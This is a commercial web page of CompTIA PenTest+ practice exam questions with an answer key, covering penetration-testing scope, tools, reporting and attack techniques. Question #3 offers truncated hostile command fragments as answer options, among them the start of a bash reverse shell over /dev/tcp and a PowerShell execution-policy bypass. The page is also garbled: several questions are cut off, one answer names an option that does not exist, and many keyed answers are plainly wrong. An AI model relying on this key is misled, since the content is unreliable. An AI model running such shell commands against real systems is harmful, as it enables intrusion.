Boost Your Certification Prep with CompTIA PT0-002 Mock Tests, CompTIA PenTest+ Certification | SPOTO

Enhance your preparation for the CompTIA PenTest+ (PT0-002) certification with our specialized CompTIA PT0-002 Mock Tests. Practice the latest exam questions to boost your certification prep effectively. Our comprehensive study materials include practice tests, sample questions, exam dumps, and exam questions and answers to ensure thorough preparation. The CompTIA PenTest+ certification is specifically designed for cybersecurity professionals entrusted with penetration testing and vulnerability management responsibilities. Utilize our mock exams and exam simulator for a realistic exam experience, enhancing your confidence and readiness. Access our exam materials and exam answers to reinforce your understanding and mastery of key concepts. With our exam preparation resources and mock tests, you'll be well-equipped to succeed in your PT0-002 exam and earn your CompTIA PenTest+ certification.

Question #1
A penetration tester who is performing an engagement notices a specific host is vulnerable to EternalBlue. Which of the following would BEST protect against this vulnerability?
A. Network segmentation
B. Key rotation
C. Encrypted passwords
D. Patch management
Correct Answer: D
Question #2
A penetration tester is reviewing the following SOW prior to engaging with a client: “Network diagrams, logical and physical asset inventory, and employees’ names are to be treated as client confidential. Upon completion of the engagement, the penetration tester will submit findings to the client’s Chief Information Security Officer (CISO) via encrypted protocols and subsequently dispose of all findings by erasing them in a secure manner.” Based on the information in the SOW, which of the following behavior
A. Utilizing proprietary penetration-testing tools that are not available to the public or to the client for auditing and inspection
B. Utilizing public-key cryptography to ensure findings are delivered to the CISO upon completion of the engagement
C. Failing to share with the client critical vulnerabilities that exist within the client architecture to appease the client’s senior leadership team
D. Seeking help with the engagement in underground hacker forums by sharing the client’s public IP address
E. Using a software-based erase tool to wipe the client’s findings from the penetration tester’s laptop
F. Retaining the SOW within the penetration tester’s company for future use so the sales team can plan future engagements
Correct Answer: A
Question #3
A penetration tester ran the following command on a staging server:
python -m SimpleHTTPServer 9891
Which of the following commands could be used to download a file named exploit to a target machine for execution?
A. nc 10
B. powershell -exec bypass -f \\10
C. bash -i >& /dev/tcp/10
D. wget 10
Correct Answer: B
Question #4
Which of the following BEST describe the OWASP Top 10? (Choose two.)
A. The most critical risks of web applications
B. A list of all the risks of web applications
C. The risks defined in order of importance
D. A web-application security standard
E. A risk-governance and compliance framework
F. A checklist of Apache vulnerabilities
Correct Answer: C
Question #5
Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?
A. A quick description of the vulnerability and a high-level control to fix it
B. Information regarding the business impact if compromised
C. The executive summary and information regarding the testing company
D. The rules of engagement from the assessment
Correct Answer: D
Question #6
You are a security analyst tasked with hardening a web server. You have been given a list of HTTP payloads that were flagged as malicious. INSTRUCTIONS Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future. If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
A. Mastered
B. Not Mastered
Correct Answer: C
Question #7
After running the enum4linux.pl command, a penetration tester received the following output: Which of the following commands should the penetration tester run NEXT?
A. smbspool //192
B. net rpc share -S 192
C. smbget //192
D. smbclient //192
Correct Answer: D
Question #8
A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive?
A. Run another scanner to compare
B. Perform a manual test on the server
C. Check the results on the scanner
D. Look for the vulnerability online
Correct Answer: D
Question #9
A private investigation firm is requesting a penetration test to determine the likelihood that attackers can gain access to mobile devices and then exfiltrate data from those devices. Which of the following is a social-engineering method that, if successful, would MOST likely enable both objectives?
A. Send an SMS with a spoofed service number including a link to download a malicious application
B. Exploit a vulnerability in the MDM and create a new account and device profile
C. Perform vishing on the IT help desk to gather a list of approved device IMEIs for masquerading
D. Infest a website that is often used by employees with malware targeted toward x86 architectures
Correct Answer: B
Question #10
A company hired a penetration-testing team to review the cyber-physical systems in a manufacturing plant. The team immediately discovered the supervisory systems and PLCs are both connected to the company intranet. Which of the following assumptions, if made by the penetration-testing team, is MOST likely to be valid?
A. PLCs will not act upon commands injected over the network
B. Supervisors and controllers are on a separate virtual network by default
C. Controllers will not validate the origin of commands
D. Supervisory systems will detect a malicious injection of code/commands
Correct Answer: C
Question #11
A penetration tester is conducting an engagement against an internet-facing web application and planning a phishing campaign. Which of the following is the BEST passive method of obtaining the technical contacts for the website?
A. WHOIS domain lookup
B. Job listing and recruitment ads
C. SSL certificate information
D. Public data breach dumps
Correct Answer: C
Question #12
A penetration tester was able to gather MD5 hashes from a server and crack the hashes easily with rainbow tables. Which of the following should be included as a recommendation in the remediation report?
A. Stronger algorithmic requirements
B. Access controls on the server
C. Encryption on the user passwords
D. A patch management program
Correct Answer: D
Question #13
A penetration tester has been hired to examine a website for flaws. During one of the time windows for testing, a network engineer notices a flood of GET requests to the web server, reducing the website’s response time by 80%. The network engineer contacts the penetration tester to determine if these GET requests are part of the test. Which of the following BEST describes the purpose of checking with the penetration tester?
A. Situational awareness
B. Rescheduling
C. DDoS defense
D. Deconfliction
Correct Answer: B
Question #14
Which of the following tools would be BEST suited to perform a manual web application security assessment? (Choose two.)
A. OWASP ZAP
B. Nmap
C. Nessus
D. BeEF
E. Hydra
F. Burp Suite
Correct Answer: AF
Question #15
A red team gained access to the internal network of a client during an engagement and used the Responder tool to capture important data. Which of the following was captured by the testing team?
A. Multiple handshakes
B. IP addresses
C. Encrypted file transfers
D. User hashes sent over SMB
Correct Answer: C
Question #16
Performing a penetration test against an environment with SCADA devices brings additional safety risk because the:
A. devices produce more heat and consume more power
B. devices are obsolete and are no longer available for replacement
C. protocols are more difficult to understand
D. devices may cause physical world effects
Correct Answer: B
Question #17
A penetration tester will be performing a vulnerability scan as part of the penetration test on a client's website. The tester plans to run several Nmap scripts that probe for vulnerabilities while avoiding detection. Which of the following Nmap options will the penetration tester MOST likely utilize?
A. -8 -T0
B. --script "http*vuln*"
C. -sn
D. -O -A
Correct Answer: C
Question #18
Which of the following is the MOST important information to have on a penetration testing report that is written for the developers?
A. Executive summary
B. Remediation
C. Methodology
D. Metrics and measures
Correct Answer: A
